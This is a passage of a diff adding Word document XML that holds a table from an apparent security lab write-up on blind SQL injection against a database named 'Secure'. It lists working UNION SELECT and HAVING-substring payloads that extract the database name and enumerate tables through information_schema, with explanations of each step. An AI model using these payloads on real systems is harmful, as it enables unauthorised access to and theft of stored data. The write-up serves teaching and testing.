+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>F</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>rom the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> responses of a) and b) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">we </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>know that here is a</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>n</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SQL injection point</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and three columns are selected in the original statement.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="7"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substring(database(),1,1)=BINARY 'S' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="7"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>) correctly.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>n b), we increment the length of substring by one and try to guess the second character.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">We </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>repeat</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>step b)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> till the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>length can no longer increase</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> e.g., </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>no character in the current candidate charset satisf</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the next guess</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ing character.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>t might be the case that we have found the whole string, or that we have ran out the candidate charset.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>hen we have two options:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="8"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>We</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> will</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking for, or there is actually a next character but it is missing in the current candidate charset, which should be a very rare case but if it happens, we will need to expand our charset</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="8"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">We assume that we have got the correct guess and continue our exploitation. If we cannot proceed further, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this should be</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> one of places we </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>suspect</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">n this case, we happen to get all the characters covered in our first candidate charset (See </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>charset</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> variable in </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>sqli.py</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and find out </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the value of </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>), the current database name, to be “Secure”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
